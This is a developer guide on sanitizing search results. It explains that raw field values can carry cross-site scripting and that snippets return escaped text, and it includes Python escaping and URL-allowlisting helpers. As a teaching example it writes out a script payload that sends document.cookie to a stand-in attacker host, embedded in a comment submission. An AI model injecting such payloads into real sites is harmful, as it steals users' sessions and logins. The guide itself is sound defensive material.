Sanitization Guide

A query against your Engine returns documents.

A document, in its tidiest form, looks like so:

{
  "nps_link": "https://www.nps.gov/romo/index.htm",
  "title": "Rocky Mountain",
  "date_established": "1915-01-26T06:00:00+00:00",
  "world_heritage_site": "false",
  "states": [ "Colorado" ],
  "description": "Bisected north to south by the Continental Divide, this portion of the Rockies has ecosystems varying from over 150 riparian lakes to montane and subalpine forests to treeless alpine tundra. Wildlife including mule deer, bighorn sheep, black bears, and cougars inhabit its igneous mountains and glacial valleys. Longs Peak, a classic Colorado fourteener, and the scenic Bear Lake are popular destinations, as well as the historic Trail Ridge Road, which reaches an elevation of more than 12,000 feet (3,700 m).",
  "visitors": 4517585,
  "id": "park_rocky-mountain",
  "location": "40.4,-105.58",
  "square_km": 1075.6,
  "acres": 265795.2
}

It is a classic JSON object with key/value pairs.

When a document is returned via search, the presentation of the values will change depending on how you have parameterized your query.

A very basic query, with no alteration, will return raw values:

{
    "nps_link": {
      "raw": "https://www.nps.gov/romo/index.htm"
    },
    "title": {
      "raw": "Rocky Mountain"
    },
    "date_established": {
      "raw": "1915-01-26T06:00:00+00:00"
    },
    "world_heritage_site": {
      "raw": "false"
    },
    "states": {
      "raw": [
        "Colorado"
      ]
    },
    "description": {
      "raw": "Bisected north to south by the Continental Divide, this portion of the Rockies has ecosystems varying from over 150 riparian lakes to montane and subalpine forests to treeless alpine tundra. Wildlife including mule deer, bighorn sheep, black bears, and cougars inhabit its igneous mountains and glacial valleys. Longs Peak, a classic Colorado fourteener, and the scenic Bear Lake are popular destinations, as well as the historic Trail Ridge Road, which reaches an elevation of more than 12,000 feet (3,700 m)."
    },
    "visitors": {
      "raw": 4517585
    },
    "id": {
      "raw": "park_rocky-mountain"
    },
    "location": {
      "raw": "40.4,-105.58"
    },
    "square_km": {
      "raw": 1075.6
    },
    "acres": {
      "raw": 265795.2
    },
    "_meta": {
      "score": 17.739115
    }
  }

A raw value is un-sanitized.

It is an exact representation of the value within a field, so rendering it as-is may expose your application to XSS attacks!
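As a rough illustration of the response shape above, the sketch below collapses a search result back into a flat key/value document by reading each field's raw value. The name flatten_raw is hypothetical and not part of any client library, and flattening does nothing to sanitize the values.

```python
from typing import Any, Dict


def flatten_raw(result: Dict[str, Any]) -> Dict[str, Any]:
    """Collapse {"field": {"raw": value}} pairs into {"field": value}.

    Hypothetical helper for illustration only. Keys that start with an
    underscore (such as "_meta") and fields without a "raw" value are
    skipped. The returned values are still un-sanitized.
    """
    flat = {}
    for name, wrapper in result.items():
        if name.startswith("_"):
            continue
        if isinstance(wrapper, dict) and "raw" in wrapper:
            flat[name] = wrapper["raw"]
    return flat


result = {
    "title": {"raw": "Rocky Mountain"},
    "states": {"raw": ["Colorado"]},
    "visitors": {"raw": 4517585},
    "_meta": {"score": 17.739115},
}
print(flatten_raw(result))
```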

An enhancement to the basic query is the result_fields parameter.

It allows one to specify how many characters to return and whether to return a raw or snippet value.

A snippet value can be between 20 and 1000 characters.

A raw value must be at least 20 characters. It does not have an upper bound, apart from the maximum document size.
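The size rules above can be checked on the client before a request is sent. The following is a minimal sketch, assuming only the bounds stated in this guide; build_result_fields and the constant names are hypothetical, not part of an official client.

```python
import json
from typing import Any, Dict

# Bounds taken from the text above; the names are illustrative.
MIN_SIZE = 20
MAX_SNIPPET_SIZE = 1000


def build_result_fields(field: str, kind: str, size: int) -> Dict[str, Any]:
    """Return a result_fields entry for one field, validating the size."""
    if kind not in ("raw", "snippet"):
        raise ValueError("kind must be 'raw' or 'snippet'")
    if size < MIN_SIZE:
        raise ValueError(f"size must be at least {MIN_SIZE}")
    if kind == "snippet" and size > MAX_SNIPPET_SIZE:
        raise ValueError(f"snippet size must be at most {MAX_SNIPPET_SIZE}")
    return {field: {kind: {"size": size}}}


body = {
    "query": "rocky mountain national park",
    "result_fields": build_result_fields("description", "raw", 20),
}
print(json.dumps(body, indent=2))
```

The resulting body can be used as the JSON payload of a search request.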

For demonstration purposes, the following query...

curl -X GET '<ENTERPRISE_SEARCH_BASE_URL>/api/as/v1/engines/national-parks-demo/search' \
-H 'Content-Type: application/json' \
-H 'Authorization: Bearer search-soaewu2ye6uc45dr8mcd54v8' \
-d '{
  "query": "rocky mountain national park",
  "result_fields": {
    "description": {
      "raw": {
        "size": 20
      }
    }
  }
}'

... will return only the requested description field, alongside the document id and _meta. The value is in raw format and has been truncated by the "size": 20 parameter:

...
{
   "description": {
     "raw": "Bisected north to"
   },
   "id": {
     "raw": "park_rocky-mountain"
   },
   "_meta": {
     "score": 14.25167
   }
}
...

Instead of asking for a raw value, we can also request a snippet.

Snippets enhance the user experience by highlighting direct query matches within your results.

They work only on text fields.

And they also act as a sort of preventative measure against Cross-site Scripting (XSS) attacks.

Within your application, you might allow users to comment on a product, write articles, or provide status updates.

Perhaps that looks something like this:

curl -X POST 'https://example.com/product/3/comment' \
-H 'Content-Type: application/json' \
-d '{
  "comment": "An amazing product!"
}'

If the input has not been sanitized, some shady character might take advantage.

They can inject malicious JavaScript alongside the comment...!

This fake script is designed to steal the cookies of a site goer, which the attacker could then use to steal a user’s login or personal information:

<script>window.location='http://cookiestealer.jerk/?stolencookie='+document.cookie</script>

curl -X POST 'https://example.com/product/3/comment' \
-H 'Content-Type: application/json' \
-d '{
  "comment": "An amazing <script>window.location='\''http://cookiestealer.jerk/?stolencookie='\''+document.cookie</script> product!"
}'

Now this comment might be sent both to your database and your Engine for searching.

Since you want your comments searchable, the full text value would be indexed — including the malicious JavaScript.

If we return raw values, we return the exact contents of the matching document field. And so this...

curl -X POST '<ENTERPRISE_SEARCH_BASE_URL>/api/as/v1/engines/xss-demo/search' \
-H 'Content-Type: application/json' \
-H 'Authorization: Bearer search-7eud55t7ecdmqzcanjsc9cqu' \
-d '{
  "query": "amazing",
  "result_fields": {
    "comment": {
      "raw": {
        "size": 200
      }
    }
  }
}'

... would return this:

...
{
  ...
   "comment": {
     "raw": "An amazing <script>window.location='http://cookiestealer.jerk/?stolencookie='+document.cookie</script> product!"
   }
   ...
}
...

Depending on how you are displaying your search results, this could inject the malicious code into your searcher’s results.

This is dangerous!

A snippet does not have this risk...

curl -X POST '<ENTERPRISE_SEARCH_BASE_URL>/api/as/v1/engines/xss-demo/search' \
-H 'Content-Type: application/json' \
-H 'Authorization: Bearer search-7eud55t7ecdmqzcanjsc9cqu' \
-d '{
  "query": "amazing",
  "result_fields": {
    "comment": {
      "snippet": {
        "size": 200
      }
    }
  }
}'

Which would return this:

{
  ...
    "comment": {
       "snippet": "An <em>amazing</em> &lt;script&gt;window.location=&#x27;http:&#x2F;&#x2F;cookiestealer.jerk&#x2F;?stolencookie=&#x27;+document.cookie&lt;&#x2F;script&gt; product!"
     }
  ...
}

Ah-ha! The malicious code has become gibberish: its HTML-significant characters have been replaced with entities. The only browser-interpretable markup that snippets return is the <em></em> tags.
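To make that concrete, here is a small sketch that takes a snippet like the one in the response above, strips the highlight tags, and decodes the entities to recover the text that was originally indexed. It then checks whether that text contains anything tag-like, which could be used to flag a document for review. The function names and the tag pattern are assumptions for illustration, not part of the API.

```python
import html
import re

# Highlight tags added by snippets, and a loose pattern for any HTML-like tag.
EM_TAG = re.compile(r"</?em>")
HTML_TAG = re.compile(r"<\s*/?\s*[A-Za-z][^>]*>")


def original_text(snippet: str) -> str:
    """Remove <em> highlights and decode entities to recover the indexed text."""
    return html.unescape(EM_TAG.sub("", snippet))


def looks_like_markup(snippet: str) -> bool:
    """Return True if the indexed text behind a snippet contains a tag."""
    return HTML_TAG.search(original_text(snippet)) is not None


snippet = (
    "An <em>amazing</em> &lt;script&gt;window.location=&#x27;http:&#x2F;&#x2F;"
    "cookiestealer.jerk&#x2F;?stolencookie=&#x27;+document.cookie"
    "&lt;&#x2F;script&gt; product!"
)
print(looks_like_markup(snippet))
print(looks_like_markup("An <em>amazing</em> product!"))
```

The decoded text is intended for logs or moderation tooling only; it is as unsafe to render as the raw value.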

Your moderators can see very quickly that someone is up to no good and you can remove offending documents from your Engine.

While snippets provide some protection against XSS attacks, their key purpose is to improve the scannability of search results.

Highlighted query matches provide a better user experience. And raw responses are valuable, too.

They should be used, but with caution.

A common risky case is injecting a raw value directly into the DOM, for example by rendering something such as href={result.url.raw} within your results.
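One way to reduce the risk in the href case is to accept only http and https URLs before a raw value reaches a link, since a value such as javascript:... can run code when clicked. The sketch below is one possible server-side check, assuming results are rendered from Python; safe_href, ALLOWED_SCHEMES, and the "#" fallback are hypothetical choices.

```python
import html
from urllib.parse import urlsplit

# Schemes we are willing to place in an href; everything else is rejected.
ALLOWED_SCHEMES = {"http", "https"}


def safe_href(url: str, fallback: str = "#") -> str:
    """Return an attribute-safe URL, or the fallback if the URL is suspect."""
    candidate = url.strip()
    try:
        parts = urlsplit(candidate)
    except ValueError:
        # urlsplit rejects some malformed URLs, e.g. a broken IPv6 host.
        return fallback
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        return fallback
    # Escape &, <, >, and quotes so the value cannot break out of the attribute.
    return html.escape(candidate, quote=True)


print(safe_href("https://www.nps.gov/romo/index.htm"))
print(safe_href("javascript:alert(document.cookie)"))
```

An allowlist is used rather than a blocklist because the set of dangerous schemes is open-ended, while the set of schemes a search result needs is small.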

We hope the potential risks of accepting un-sanitized raw values are now clear.

Be sure to implement your own mechanism of sanitization!
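As a starting point, a minimal sketch of such a mechanism is shown below. It escapes raw string values with Python's standard html.escape before they are placed in an HTML page. The helper name escape_raw is hypothetical, and this covers only HTML text and attribute contexts; values placed in URLs, scripts, or styles need context-specific handling.

```python
import html
from typing import Any


def escape_raw(value: Any) -> Any:
    """Escape HTML-significant characters in a raw value.

    Strings are escaped, lists are escaped item by item, and other
    types (numbers, for example) are returned unchanged.
    """
    if isinstance(value, str):
        return html.escape(value, quote=True)
    if isinstance(value, list):
        return [escape_raw(item) for item in value]
    return value


raw_comment = (
    "An amazing <script>window.location='http://cookiestealer.jerk/"
    "?stolencookie='+document.cookie</script> product!"
)
print(escape_raw(raw_comment))
```

The output resembles a snippet without the highlighting, although html.escape leaves forward slashes as they are.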

Equipped with this insight into sanitization, check out the Results Fields API Reference.
